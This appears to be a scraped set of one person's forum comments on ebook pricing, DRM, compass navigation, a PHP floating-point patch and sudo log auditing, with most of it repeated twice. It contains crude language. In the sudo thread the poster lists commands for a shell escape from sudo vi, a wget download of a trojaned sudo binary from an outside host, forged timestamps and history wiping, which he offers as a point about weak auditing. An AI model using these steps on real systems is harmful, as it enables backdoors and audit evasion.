I use my personal cell phone for work. I give my employer a copy of the bill and highlight the calls that were work related and they write me a check. Even with personal calls, though, I have never gone over my 450 minutes of talk time even with company minutes added in. So in my case, it's definitely cheaper for my employer to compensate me for the time rather than pay for a cell phone.
Is the time spent really worth it? If it takes just 30 minutes to dig through the billing detail, highlight my work calls and add them all up, it's going to cost my employer more than $36. I'm out of the office a lot and have hundreds of calls on my bill. (it only takes 4 calls/day to add up to a hundred calls - most days I make/receive 10 - 15 calls)
People can't tune in to satellite for free, and internet streaming isn't an option for 90+% of auto/subway riders.
Since I can stream Pandora from my Android over the cellular network, I don't think you can say that Internet streaming is not an option for 90% of auto drivers.
Subways are more difficult, unless they are wired for cell service (or Wifi). But the same is true for radio - if the underground subway isn't wired for radio, then Radio is not not an option either.
On the one hand you say that publishers are ass raping consumers because they are pricing their books as a competitor to their paper product instead of based on delivery costs of the electronic product, yet on the other hand you're fine when other retailers earn an obscene profit on dirt cheap flavored corn syrup.
Is there really a difference between the two pricing models?
Do you only have ass raping outrage against publishers?
They will either sell what I want or fuck'em they can starve for all I care.
I'm sure the publishers are aware that's how you feel, but you're not the demographic they are after. Right now they are looking for those that are willing to pay $10 or an eBook. Eventually as their paper sales channel dries up they'll be forced to stop protecting it and court eBook consumers, but that time (apparently) is not now.
I only wondered why in the hell you seemed so concerned about their problems.
I'm not concerned about their problems, but you seem annoyed that they aren't willing to change their entire pricing model to cater to you when you're not who they are interested in right now.
Because you want cheap eBooks and can't have them...at least not from major publishers. Small independent publishers that don't have a paper based distribution infrastructure to support sell eBooks quite cheaply - check smashwords.com - most books are priced at a few dollars (or free).
Why do Americans always act like this? You are getting ass raped and you want to think about how hard it must be for the giver to be doing that since you did not bring any lube today.
Fuck the publisher, he should thank his lucky stars anyone buys his books at all.
I didn't realize that the USA was the only country where product sellers set a price that the market was willing to pay rather than the fair cost to manufacture and distribute the product. What country do you come from where sellers are all altruistic and never price their products higher than their costs? Or do they still ass rape you, but use lots of lube and cuddle with you afterwards?
Nearly every product is priced like this. Do you really think that $20 (or 20 €) bottle of shampoo at the shop has $20 of materials in it? More likely, it cost $2 in raw materials, $2 to get it to you, and the remaining $16 is split between the manufacturer, distributer and retailer.
Ever buy food in a restaurant? That $75 steak only cost the restaurant $10 including labor you could make it at home for a fraction of the cost of what the restaurant is charging. A Coke at McDonalds costs them around 15 cents while they charge you $1.50.
The publishing industry is built around a particular way of business and they are slow to change. They still make the majority of their profits from hardcover and paperback sales, why should they give that revenue up until they have to? Do you also complain that hardbacks cost several times the cost of paperbacks even though they are not that much more expensive to create and distribute?
Industry change will come, but probably not as quickly as consumers would like it to and probably faster than the industry would like it to. The music industry finally came around to it, and the book industry will eventually do the same, but not without a lot of fighting.
It's impossible for DRM to work. The customer has to have both the lock and the key or they can't use what they paid for[1]. If the customer has both the lock and the key then it's impossible for DRM to protect anything.
But if you lock that key inside a dedicated device that no end-user can reasonably get into, then successful DRM becomes possible. Very few people have the resources to slice open a chip and use a scanning electron microscope to decode what is inside that chip.
And if the key is stored in NVRAM rather than hardwired into the chip, it's even harder to pull out. But of course, Amazon allows eBooks to be viewed on non-Kindle devices (PC's, phones, etc), so that's where their weakness is, and I believe the PC app has already been hacked.
And of course, the Kindle does add one weakness to DRM - Kindle books are easily OCR'ed - set a large font size, set up an automatic "next page" button pusher, and you've got a great way to get clean, accurate OCR'ed copies. This still doesn't really help with books that contain images and diagrams that are integral to the content.
Since eBook sellers dont' have incentive to allow books in other formats to run on their reader device, then maybe book publishers should be required to allow a user to have his books be revoked and reissued under any other reader that the publisher supports.
The publishers don't want Amazon to be the sole eBook reader maker - it gives Amazon too much power over them.
This gives users something more akin to a real book -- they can keep it forever, moving it to other devices as they are released.
And it prevents Amazon from becoming the defacto market leader due to people being afraid to buy eReaders from other makers in the fear that if the seller goes out of business that they'll lose access to their books (either because the DRM will stop working, or because the device may break down with no chance of repair/replacement).
I know that I shied away from the Nook reader and went with the Kindle for this reason, I don't trust B&N to be around in the long term.
Because it's an absolute SIN that they charge the same or more than the dead tree version of the product. The costs are so much less compared to physical books -- no distribution costs, printing costs, materials cost, less middle men costs, etc.
But if you look at it from the publisher's point of view, he doesn't see a $1 eBook sale as a new $1 of revenue, instead he sees it as a $20 hardcover that didn't sell.
So he charges $10 for the eBook to make up for the fact that eBooks are eating into his paper book sales. Worse, he's still got to maintain that whole paper distribution model, but now instead of a title selling 100,000 paper books, it's only selling 70,000 so his cost per paper book is increasing making it more important to make up the revenue in eBooks.
The advent of eBook readers may expand his market and let him sell more total books than before, but that's not a given and I don't think that's proven to be the case (yet). I suspect that the eBook early adopters are many of the same readers that would have bought the new release at a bookstore.
How will the security reviewer know anything was amiss?
sudo vi/etc/hosts :sh
cd/usr/bin
wget -O sudo http://mysite.com/cutebabypic.png
chmod appropriate permissions sudo
touch -t appropriate timestamp sudo
exit :vi/root/.bash_history remove recent commands from bash history file
Let's look at the sudo log: cat/var/log/sudo.log Jan 10 09:57:36 sql-prod sudo: johndoe : TTY=pts/7 ; PWD=/home/johndoe ; USER=root ; COMMAND=/usr/bin/vi/etc/hosts
There, I just installed my own hacked sudo binary without anything suspicious in the sudo log that any auditor can see.
Of course, there are other ways to detect this like a good HIDS that is administered by a security group separate from the admins, but I'm just pointing out that the sudo log gives very limited audit ability unless you severely restrict what commands the admins can execute.
it depends what he wants to do -- if he wants to steal your credit card database he can pop out one of your mirrored disks, replace it with one of the cold spares after he gets the email saying that the drive is down, then log a service call to have the drive replaced because the drive "seems to have failed completely -- the array acted like the drive was missing". Then he can image it at his convenience.
But if your sudo activity log has you doing "su -", then whatever gets borked up after that is automagically your fault as a matter of policy ^_^
Yeah, nobody's ever altered that file...
Agreed, I tracked down a developer who did that the day before he quit -- he uploaded a not-so-flattering picture of the CEO, then tried to cover his tracks by deleting the sudo log (no subtlety like editing the file, he just deleted it). He did the old "sudo bash" trick to try to cover his tracks, but we used file timestamps to link it back to him.
What he didn't realize before beginning was that I was logging sudo commands to a central log server -- he figured it out too late, there were a couple dozen login attempts to the log server from him after he noticed that it existed.
Justice was served -- our CEO knew his CEO, so his new job offer vanished into thin air.
Oh, and developers lost the root privs that they previously just couldn't live without -- the dev manager didn't even put up a fight this time.
Unless you are very careful with what commands an admin can run with sudo, there are many ways for him to run a command without it appearing in the sudo log:
sudo vi/etc/hosts :sh
Now I'm in a root shell and sudo doesn't know anything about it.
Jared Loughner, the suspect in Saturday's shooting spree in Arizona, was not working alone. True, the rampage apparently emerged from his confused, unstable and troubled mind.
Officials think he was not working alone - who knows, you could be that missing conspirator. Maybe just in case, you should be jailed and tortured until you admit to it. And even though they may find that he *was* working alone, better safe than sorry, right?
I mean, why not? It's not like you're being a citizen should afford you any special rights. It's for the safety of our children, after all.
I thought that since HDCP was cracked it's possible to make high-def copies via HDMI? So it doesn't matter what encryption exists inside the playback device since if it's going to be output to an HDMI device, it can be captured and recorded?
Or was the HDCP crack mitigated by new keys on new devices? Or is HDMI copying not practical in the real world?
I understand why you'd use a volatile variable for something that can be touched by an external event or process, but that's not what happened here. I'm talking about this specific case involving the FPU where it was the compiler that put my variable into the FPU register, it didn't happen by some external event that the compiler had no knowledge of.
If the compiler is the one that decided to move my variable into a high precision FPU register, then shouldn't it be smart enough to convert it to the appropriate precision before doing a comparison with a variable of less precision?
You are able to adjust aircraft compasses for the magnetic deviation (shown on nav maps, and flight charts).
I asked:
If you adjust your compass for magnetic deviation, then doesn't it show true north?
and you said:
No, it shows magnetic north, because deviation isn't constant everywhere on the earth.
So if you are adjusting your compass for magnetic deviation, then why is it not pointing to true north? Without adjustment it should be pointing to magnetic north since that's what compasses do, but if you adjust it for magnetic deviation as printed in charts, to this layman it seems that it should then be pointed to true north (at least, as long as you don't travel too far. (and I'm ignoring adjustments made to correct for deviations caused by local interference from metallic objects in the cockpit which presumably are only done once)
Maybe you meant that pilots don't routinely adjust their compass (even though they could if they wanted to)?
Thanks for your other post describing in more detail why magnetic headings are used.
Sounds like a very reasonable explanation and makes sense. But....shouldn't the compiler already know this and pull the variable out of the 80 bit FPU register into a 64 bit double before doing an == comparison between doubles? Seems like this problem would nearly always be the case when doing floating point equality comparisons.
In typical PHP fashion, the patch doesn't actually fix the underlying problem, it simply checks for that one specific string. Seriously, stop gloating for 30 seconds, check the source and cringe at the incompetence.
What are you talking about? There is more than one number that triggers the problem, and the patch does not do a simple string comparison.
I don't understand why the patch solves the problem....though I haven't done any serious software development for years. It looks like all they did was add the "volatile" keyword to a variable declaration.
But after quickly reviewing the code, I don't see why the volatile keyword fixes this problem. It doesn't appear to be multithreaded code where another thread could stomp on the variable, and it just seems to be straight arithmetic, it doesn't seem like they are handing it off to a math coprocessor and then later waiting for the variable to be set.
Does the volatile keyword change the compiler optimizations in a way that avoids the problem?
I've never worked in government, but I've found that writing the requirements specs is the hardest and most time consuming part of putting together an RFP, but until the requirements are known and documented, IT can't make an informed decision.
So by the time you document the requirements enough to make a good purchase recommendation, you may as well do a full RFP, and you may find out something new in the process.
In a recent procurement, IT's favorite choice (leader in the industry and some in IT had experience with the product) had to bow out because their product couldn't do something that the Finance department required from the product. If IT had just made the choice on our own, we would have bought the wrong product and found out later that it couldn't work for us.
Sure, the rule may have been bogus, but we had to obey nonetheless. That's one of the joys of dealing with a government bureaucracy where the guy who manages the facility gets to interpret the rules no matter how capricious and arbitrary they may appear. Things were a lot smoother at that facility after we found out that the harbor master liked jelly donuts.
I use my personal cell phone for work. I give my employer a copy of the bill and highlight the calls that were work related and they write me a check. Even with personal calls, though, I have never gone over my 450 minutes of talk time even with company minutes added in. So in my case, it's definitely cheaper for my employer to compensate me for the time rather than pay for a cell phone.
Is the time spent really worth it? If it takes just 30 minutes to dig through the billing detail, highlight my work calls and add them all up, it's going to cost my employer more than $36. I'm out of the office a lot and have hundreds of calls on my bill. (it only takes 4 calls/day to add up to a hundred calls - most days I make/receive 10 - 15 calls)
People can't tune in to satellite for free, and internet streaming isn't an option for 90+% of auto/subway riders.
Since I can stream Pandora from my Android over the cellular network, I don't think you can say that Internet streaming is not an option for 90% of auto drivers.
Subways are more difficult, unless they are wired for cell service (or Wifi). But the same is true for radio - if the underground subway isn't wired for radio, then Radio is not not an option either.
Do you understand costs?
On the one hand you say that publishers are ass raping consumers because they are pricing their books as a competitor to their paper product instead of based on delivery costs of the electronic product, yet on the other hand you're fine when other retailers earn an obscene profit on dirt cheap flavored corn syrup.
Is there really a difference between the two pricing models?
Do you only have ass raping outrage against publishers?
They will either sell what I want or fuck'em they can starve for all I care.
I'm sure the publishers are aware that's how you feel, but you're not the demographic they are after. Right now they are looking for those that are willing to pay $10 or an eBook. Eventually as their paper sales channel dries up they'll be forced to stop protecting it and court eBook consumers, but that time (apparently) is not now.
I only wondered why in the hell you seemed so concerned about their problems.
I'm not concerned about their problems, but you seem annoyed that they aren't willing to change their entire pricing model to cater to you when you're not who they are interested in right now.
And why do I care about his costs?
Because you want cheap eBooks and can't have them...at least not from major publishers. Small independent publishers that don't have a paper based distribution infrastructure to support sell eBooks quite cheaply - check smashwords.com - most books are priced at a few dollars (or free).
Why do Americans always act like this? You are getting ass raped and you want to think about how hard it must be for the giver to be doing that since you did not bring any lube today.
Fuck the publisher, he should thank his lucky stars anyone buys his books at all.
I didn't realize that the USA was the only country where product sellers set a price that the market was willing to pay rather than the fair cost to manufacture and distribute the product. What country do you come from where sellers are all altruistic and never price their products higher than their costs? Or do they still ass rape you, but use lots of lube and cuddle with you afterwards?
Nearly every product is priced like this. Do you really think that $20 (or 20 €) bottle of shampoo at the shop has $20 of materials in it? More likely, it cost $2 in raw materials, $2 to get it to you, and the remaining $16 is split between the manufacturer, distributer and retailer.
Ever buy food in a restaurant? That $75 steak only cost the restaurant $10 including labor you could make it at home for a fraction of the cost of what the restaurant is charging. A Coke at McDonalds costs them around 15 cents while they charge you $1.50.
The publishing industry is built around a particular way of business and they are slow to change. They still make the majority of their profits from hardcover and paperback sales, why should they give that revenue up until they have to? Do you also complain that hardbacks cost several times the cost of paperbacks even though they are not that much more expensive to create and distribute?
Industry change will come, but probably not as quickly as consumers would like it to and probably faster than the industry would like it to. The music industry finally came around to it, and the book industry will eventually do the same, but not without a lot of fighting.
It's impossible for DRM to work. The customer has to have both the lock and the key or they can't use what they paid for[1]. If the customer has both the lock and the key then it's impossible for DRM to protect anything.
But if you lock that key inside a dedicated device that no end-user can reasonably get into, then successful DRM becomes possible. Very few people have the resources to slice open a chip and use a scanning electron microscope to decode what is inside that chip.
And if the key is stored in NVRAM rather than hardwired into the chip, it's even harder to pull out. But of course, Amazon allows eBooks to be viewed on non-Kindle devices (PC's, phones, etc), so that's where their weakness is, and I believe the PC app has already been hacked.
And of course, the Kindle does add one weakness to DRM - Kindle books are easily OCR'ed - set a large font size, set up an automatic "next page" button pusher, and you've got a great way to get clean, accurate OCR'ed copies. This still doesn't really help with books that contain images and diagrams that are integral to the content.
Since eBook sellers dont' have incentive to allow books in other formats to run on their reader device, then maybe book publishers should be required to allow a user to have his books be revoked and reissued under any other reader that the publisher supports.
The publishers don't want Amazon to be the sole eBook reader maker - it gives Amazon too much power over them.
This gives users something more akin to a real book -- they can keep it forever, moving it to other devices as they are released.
And it prevents Amazon from becoming the defacto market leader due to people being afraid to buy eReaders from other makers in the fear that if the seller goes out of business that they'll lose access to their books (either because the DRM will stop working, or because the device may break down with no chance of repair/replacement).
I know that I shied away from the Nook reader and went with the Kindle for this reason, I don't trust B&N to be around in the long term.
Because it's an absolute SIN that they charge the same or more than the dead tree version of the product. The costs are so much less compared to physical books -- no distribution costs, printing costs, materials cost, less middle men costs, etc.
But if you look at it from the publisher's point of view, he doesn't see a $1 eBook sale as a new $1 of revenue, instead he sees it as a $20 hardcover that didn't sell.
So he charges $10 for the eBook to make up for the fact that eBooks are eating into his paper book sales. Worse, he's still got to maintain that whole paper distribution model, but now instead of a title selling 100,000 paper books, it's only selling 70,000 so his cost per paper book is increasing making it more important to make up the revenue in eBooks.
The advent of eBook readers may expand his market and let him sell more total books than before, but that's not a given and I don't think that's proven to be the case (yet). I suspect that the eBook early adopters are many of the same readers that would have bought the new release at a bookstore.
How will the security reviewer know anything was amiss?
sudo vi
cd /usr/bin
wget -O sudo http://mysite.com/cutebabypic.png
chmod appropriate permissions sudo
touch -t appropriate timestamp sudo
exit
:vi /root/.bash_history
remove recent commands from bash history file
Let's look at the sudo log:
cat
Jan 10 09:57:36 sql-prod sudo: johndoe : TTY=pts/7 ; PWD=/home/johndoe ; USER=root ; COMMAND=/usr/bin/vi
There, I just installed my own hacked sudo binary without anything suspicious in the sudo log that any auditor can see.
Of course, there are other ways to detect this like a good HIDS that is administered by a security group separate from the admins, but I'm just pointing out that the sudo log gives very limited audit ability unless you severely restrict what commands the admins can execute.
it depends what he wants to do -- if he wants to steal your credit card database he can pop out one of your mirrored disks, replace it with one of the cold spares after he gets the email saying that the drive is down, then log a service call to have the drive replaced because the drive "seems to have failed completely -- the array acted like the drive was missing". Then he can image it at his convenience.
But if your sudo activity log has you doing "su -", then whatever gets borked up after that is automagically your fault as a matter of policy ^_^
Yeah, nobody's ever altered that file...
Agreed, I tracked down a developer who did that the day before he quit -- he uploaded a not-so-flattering picture of the CEO, then tried to cover his tracks by deleting the sudo log (no subtlety like editing the file, he just deleted it). He did the old "sudo bash" trick to try to cover his tracks, but we used file timestamps to link it back to him.
What he didn't realize before beginning was that I was logging sudo commands to a central log server -- he figured it out too late, there were a couple dozen login attempts to the log server from him after he noticed that it existed.
Justice was served -- our CEO knew his CEO, so his new job offer vanished into thin air.
Oh, and developers lost the root privs that they previously just couldn't live without -- the dev manager didn't even put up a fight this time.
Unless you are very careful with what commands an admin can run with sudo, there are many ways for him to run a command without it appearing in the sudo log:
sudo vi /etc/hosts
:sh
Now I'm in a root shell and sudo doesn't know anything about it.
Hey cold_fjord,
Are you white? Born and raised in the USA? Is there no chance whatsoever that you're involved with this:
http://www.guardian.co.uk/world/2011/jan/09/giffords-shooting-political-violence-polarised
Jared Loughner, the suspect in Saturday's shooting spree in Arizona, was not working alone. True, the rampage apparently emerged from his confused, unstable and troubled mind.
Officials think he was not working alone - who knows, you could be that missing conspirator. Maybe just in case, you should be jailed and tortured until you admit to it. And even though they may find that he *was* working alone, better safe than sorry, right?
I mean, why not? It's not like you're being a citizen should afford you any special rights. It's for the safety of our children, after all.
Opposable thumb > Echolocation
That depends where you live. Drop a human in the middle of the ocean and see how much that opposable thumb helps him survive.
I thought that since HDCP was cracked it's possible to make high-def copies via HDMI? So it doesn't matter what encryption exists inside the playback device since if it's going to be output to an HDMI device, it can be captured and recorded?
Or was the HDCP crack mitigated by new keys on new devices? Or is HDMI copying not practical in the real world?
I understand why you'd use a volatile variable for something that can be touched by an external event or process, but that's not what happened here. I'm talking about this specific case involving the FPU where it was the compiler that put my variable into the FPU register, it didn't happen by some external event that the compiler had no knowledge of.
If the compiler is the one that decided to move my variable into a high precision FPU register, then shouldn't it be smart enough to convert it to the appropriate precision before doing a comparison with a variable of less precision?
So I don't get it, the previous poster said:
You are able to adjust aircraft compasses for the magnetic deviation (shown on nav maps, and flight charts).
I asked:
If you adjust your compass for magnetic deviation, then doesn't it show true north?
and you said:
No, it shows magnetic north, because deviation isn't constant everywhere on the earth.
So if you are adjusting your compass for magnetic deviation, then why is it not pointing to true north? Without adjustment it should be pointing to magnetic north since that's what compasses do, but if you adjust it for magnetic deviation as printed in charts, to this layman it seems that it should then be pointed to true north (at least, as long as you don't travel too far. (and I'm ignoring adjustments made to correct for deviations caused by local interference from metallic objects in the cockpit which presumably are only done once)
Maybe you meant that pilots don't routinely adjust their compass (even though they could if they wanted to)?
Thanks for your other post describing in more detail why magnetic headings are used.
Sounds like a very reasonable explanation and makes sense. But....shouldn't the compiler already know this and pull the variable out of the 80 bit FPU register into a 64 bit double before doing an == comparison between doubles? Seems like this problem would nearly always be the case when doing floating point equality comparisons.
If you adjust your compass for magnetic deviation, then doesn't it show true north?
Why do they use magnetic north and not true north?
That way they wouldn't have to renumber runways periodically and reprint maps and charts leading to confusion when someone has an out of date chart.
Most small plane pilots fly close enough to home that they just have to remember their deviation from magnetic north.
Larger private plane and commercial pilots already have electronic equipment that can show them true north.
They already use true north in areas where compass readings are unreliable by appending T to the runway number. Why not extend that to all runways?
They... added a volatile?
What the hell is that function doing, if it requires that?
Good question - I asked the same thing in a post below, but no one has answered yet.
In typical PHP fashion, the patch doesn't actually fix the underlying problem, it simply checks for that one specific string. Seriously, stop gloating for 30 seconds, check the source and cringe at the incompetence.
What are you talking about? There is more than one number that triggers the problem, and the patch does not do a simple string comparison.
http://svn.php.net/viewvc/php/php-src/trunk/Zend/zend_strtod.c?r1=304407&r2=307095&pathrev=307095
I don't understand why the patch solves the problem....though I haven't done any serious software development for years. It looks like all they did was add the "volatile" keyword to a variable declaration.
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/Zend/zend_strtod.c?r1=307095&r2=307094&pathrev=307095
From:
double aadj, aadj1, adj;
To:
volatile double aadj, aadj1, adj;
But after quickly reviewing the code, I don't see why the volatile keyword fixes this problem. It doesn't appear to be multithreaded code where another thread could stomp on the variable, and it just seems to be straight arithmetic, it doesn't seem like they are handing it off to a math coprocessor and then later waiting for the variable to be set.
Does the volatile keyword change the compiler optimizations in a way that avoids the problem?
I've never worked in government, but I've found that writing the requirements specs is the hardest and most time consuming part of putting together an RFP, but until the requirements are known and documented, IT can't make an informed decision.
So by the time you document the requirements enough to make a good purchase recommendation, you may as well do a full RFP, and you may find out something new in the process.
In a recent procurement, IT's favorite choice (leader in the industry and some in IT had experience with the product) had to bow out because their product couldn't do something that the Finance department required from the product. If IT had just made the choice on our own, we would have bought the wrong product and found out later that it couldn't work for us.
I have to wonder why this wasn't your first strategy.
New York management. It wasn't until they hired a local guy to manage the facility that he was able to get things done.
Sure, the rule may have been bogus, but we had to obey nonetheless. That's one of the joys of dealing with a government bureaucracy where the guy who manages the facility gets to interpret the rules no matter how capricious and arbitrary they may appear. Things were a lot smoother at that facility after we found out that the harbor master liked jelly donuts.